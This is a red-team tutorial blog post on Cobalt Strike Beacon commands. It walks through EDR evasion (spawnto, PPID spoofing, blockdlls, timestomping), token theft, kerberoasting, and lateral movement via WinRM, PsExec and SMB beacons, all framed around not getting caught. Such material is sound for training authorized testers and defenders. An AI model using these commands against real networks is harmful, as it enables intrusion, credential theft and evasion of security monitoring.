Cobalt Strike Beacon Commands: Red Team Field Guide

February 15, 2026
Cobalt Strike Beacon Commands: Red Team Field Guide

Cobalt Strike Beacon Commands: Red Team Field Guide

Updated on February 15, 2026

Let's be real for a second. If you're working in red teaming or advanced penetration testing, Cobalt Strike is isn't just a tool it's practically the industry standard for Command and Control (C2). It's the Ferrari of C2 frameworks. But just like a Ferrari, if you don't know how to drive it, you're going to crash into a wall (or in our case, trip every EDR on the network).

I've been on countless engagements where I've seen junior operators burn a solid foothold simply because they got impatient or didn't understand what was happening under the hood when they typed a command. They treat Beacon like a standard netcat shell, and that is a one-way ticket to getting kicked out of the network.

In this guide, I'm going to walk you through the most critical Cobalt Strike Beacon commands and techniques that I use on almost every engagement. We're going to move beyond the basics and look at this from an operational security (OPSEC) perspective.

Cobalt Strike Beacon Commands: Red Team Field Guide

The Philosophy of "Low and Slow"

Before we type a single command, you need to understand that Beacon is designed to be asynchronous. It's not a constant connection. It checks in, grabs tasks, executes them, and goes back to sleep. This is its greatest strength and your biggest test of patience.

Sleep and Jitter

The very first thing I do when I land a new beacon? I check the sleep time. By default, your profile might have it set to something aggressive.

# Check current settings
sleep

# Set sleep to 60 seconds with 20% jitter
# This means it will sleep anywhere between 48s and 72s
sleep 60 20

# Go interactive (DANGEROUS - noisy network traffic)
# Only do this if you are tunneling or need instant feedback
sleep 0

Senior Tip: Never use a flat sleep cycle (e.g., sleep 60 0). EDRs and network appliances love consistent patterns. That 20-30% jitter is your best friend for blending in with background noise.


Situational Awareness (Without Breaking Things)

Once you're stable, you need to know where you are. But be careful. Running loud commands like net user /domain immediately is rookie behavior.

Process & User Discovery

Instead of spawning cmd.exe to run whoami, use Beacon's native APIs which are far stealthier.

# Get your current user context (Native API, no process spawn)
getuid

# Check your privileges
getprivs

# List processes (Use this to find security products or targets for injection)
ps

OPSEC Warning: Avoid shell whoami or shell ipconfig. The shell command spawns cmd.exe as a child process, which is a massive red flag for any decent SOC. Always prefer Beacon native commands or Beacon Object Files (BOFs). You can learn more about OPSEC safe practices in our Active Directory Lateral Movement & Persistence.


Execution Strategy: The "Fork and Run" Dilemma

This is where the magic happens. Cobalt Strike uses a technique often called "Fork and Run" for many post-exploitation tasks. It spawns a temporary process, injects your capability into it, executes it, and then kills the process.

If you don't configure this, you're going to be spawning rundll32.exe every time you run a command, which looks incredibly suspicious.

Spawnto

You can and should change what process Beacon spawns for these temporary jobs.

# Check current spawnto settings
spawnto

# Change the temporary process to something legitimate for the environment
# targeting syswow64 (x86) or sysnative (x64)
spawnto x64 %windir%\sysnative\gpupdate.exe
spawnto x86 %windir%\syswow64\gpupdate.exe

By changing this to gpupdate.exe or werfault.exe, your malicious traffic looks like standard Windows background activity.

The Execution Hierarchy

Here is how I prioritize execution methods to stay under the radar:

  1. inline-execute (BOFs): Runs in your current process memory. No child process. Safest.
  2. execute-assembly: Runs .NET assemblies in a temporary process. Powerful but creates a new process.
  3. powerpick: Runs PowerShell commands without spawning powershell.exe. Uses the unmanaged PowerShell automation DLLs.
  4. execute: A "fire and forget" command. It executes a program on the target but does not capture output. Useful if you want to launch a background task or if capturing output might hang the beacon.
  5. run: Executes a program and captures output.
  6. shell: Spawns cmd.exe /c. Avoid this unless absolutely necessary.
# Good: Using PowerPick to run a quick PS command
powerpick Get-Process

# Fire and Forget: Launch a tool without waiting for it
execute C:\Windows\System32\calc.exe

# Better: Using a BOF to enumerate processes (if available)
inline-execute Pe-Bof

Advanced Injection & Custom Tooling

As you advance, you'll want to use your own custom tools or inject into existing processes to hide your presence.

dllinject

This command allows you to inject a Reflective DLL into a specific running process (identified by PID). This is useful when you want your tool to live inside a legitimate process like chrome.exe or outlook.exe rather than spawning a new temporary one.

# Inject my_tool.dll into process ID 4567
dllinject 4567 /opt/tools/my_tool.dll

execute-dll

Think of this as the unmanaged cousin of execute-assembly. It spawns a temporary process (using your spawnto settings), injects your Reflective DLL as a post-exploitation task, captures the output, and then kills the process. This is ideal for running custom C/C++ tools that follow the Reflective Loader pattern.

# Run a custom post-ex DLL and get output
execute-dll /opt/tools/custom_recon.dll argument1

Advanced OPSEC: Process Manipulation

If you want to survive in a mature environment with heavy EDR monitoring, you need to manipulate how your processes look to the operating system.

PPID Spoofing (ppid)

By default, if your beacon is in powershell.exe and you spawn cmd.exe, the parent/child relationship is clear. EDRs look for "malicious parenting" (e.g., Word spawning PowerShell). You can spoof the Parent Process ID (PPID) to make your temporary jobs look like they were spawned by a legitimate system process, like explorer.exe or svchost.exe.

# 1. List processes to find a good parent (e.g., explorer.exe with PID 2020)
ps

# 2. Set the PPID for all future spawned jobs
ppid 2020

# 3. Verify
run whoami
# The 'whoami' process will appear to be spawned by explorer.exe (PID 2020)

# Reset to default
ppid 0

BlockNonMicrosoftBinaries (blockdlls)

Many EDRs work by injecting their own DLLs into every process that starts on the system (userland hooking). This allows them to inspect your memory and API calls. You can use blockdlls to tell the Windows Kernel to prevent non-Microsoft signed DLLs from loading into your spawned processes. See the MITRE ATT&CK T1106 page for context on execution APIs.

# Enable blocking for future jobs
blockdlls start

# Disable blocking
blockdlls stop

Senior Note: Combining spawnto, ppid, and blockdlls is the holy trinity of Beacon evasion. It makes your malicious jobs look like legitimate system processes, spawned by legitimate parents, that refuse to load 3rd party security DLLs.


Credential & Token Manipulation

You've landed on a box, and you need to escalate or move.

Token Theft

If you see a Domain Admin process in your ps output, you don't always need to migrate into it. You can just steal their token.

# Steal token from PID 1234
steal_token 1234

# Verify it worked
getuid

# Drop the token and return to your original context
rev2self

Make Token

If you have a username and password (maybe found in a config file or via phishing), you can create a token to interact with network shares without fully logging in interactively.

# Create a token for network resources
make_token DOMAIN\User Password123!

# Test access (e.g., listing the C$ share of a Domain Controller)
ls \\DC01\C$

Lateral Movement & Pivoting

Moving laterally is the bread and butter of Red Teaming. We rarely stay on the patient zero machine. Check out our [Active Directory Pivoting](INSERT_INTERNAL_URL) tutorial for more strategies.

SMB Beacons (The Daisy Chain)

SMB beacons are fantastic for internal networks. They use Named Pipes to communicate over the SMB protocol (port 445).

# Link to a target machine if you have admin rights or valid creds
# This creates a child beacon linked to your current one
link DC01

# Unlink to stop the traffic but keep the session (if configured)
unlink DC01

Jump

The jump command is a wrapper for common lateral movement techniques like WinRM and PsExec.

# Use WinRM (usually port 5985) - quieter than PsExec
jump winrm64 TARGET_HOST LISTENER_NAME

# Use PsExec (Service creation) - classic, but very noisy
jump psexec64 TARGET_HOST LISTENER_NAME

Senior Note: I almost always prefer winrm over psexec. Service creation events (Event ID 7045) are monitored by everyone. WinRM traffic often blends in with administrative activity.

SOCKS Proxying

Sometimes you need to bring your external tools (like Proxychains, RDP, or a browser) into the network.

# Start a SOCKS4a proxy on your teamserver on port 1080
socks 1080

# Stop the proxy
socks stop

Now you can configure your browser or proxychains to point to your Teamserver's IP and port 1080 to browse the internal intranet.


File System Operations

Keep your file operations clean. Don't drop files in the root of C:\.

# List files
ls

# Change directory
cd C:\Users\Public\Downloads

# Upload a tool
upload /opt/tools/Seatbelt.exe

# Download sensitive data
download interesting_file.docx

Timestomp

If you upload a tool, its "Date Modified" timestamp will be the current time, sticking out like a sore thumb. Match it to a legitimate file.

# Match the timestamp of Seatbelt.exe to calc.exe
timestomp Seatbelt.exe C:\Windows\System32\calc.exe

Post-Exploitation: The Modern Way (.NET & BOFs)

Years ago, we used powershell for everything. Now, PowerShell v5 with Script Block Logging and AMSI makes that risky. We shifted to .NET assemblies and Beacon Object Files (BOFs).

Execute-Assembly

This allows you to run compiled C# tools (like Rubeus, Seatbelt, or SharpHound) entirely in memory without dropping the .exe to disk.

# Run Seatbelt to enumerate security checks
execute-assembly /tools/Seatbelt.exe -group=system

# Run Rubeus to roast kerberos tickets
execute-assembly /tools/Rubeus.exe kerberoast

Inline-Execute (BOFs)

Beacon Object Files are the current meta. They are small C programs that execute inside the beacon process. They are incredibly stealthy because they don't fork a new process.

# Example: Running a BOF to list directory contents (stealthier than ls)
inline-execute dir_bof C:\Users\

Conclusion

Cobalt Strike is powerful, but it's not a magic wand. The default configurations are known by every Blue Team on the planet. To succeed as a senior operator, you need to understand the noise you generate. Customize your Malleable C2 profiles, use spawnto to blend in, prefer BOFs over shell, and always, always mind your sleep cycles.

Happy hunting, and remember don't get caught.

Enjoyed this guide? Share your thoughts below and tell us how you leverage Cobalt Strike Beacon commands in your projects!

Cobalt Strike, Red Teaming, Beacon Commands, OPSEC, Penetration Testing, Ethical Hacking, C2 Frameworks

, ,
By:
Bhanu Namikaze

Bhanu Namikaze is an Penetration Tester, Red Teamer, Ethical Hacker, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and CTFs. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment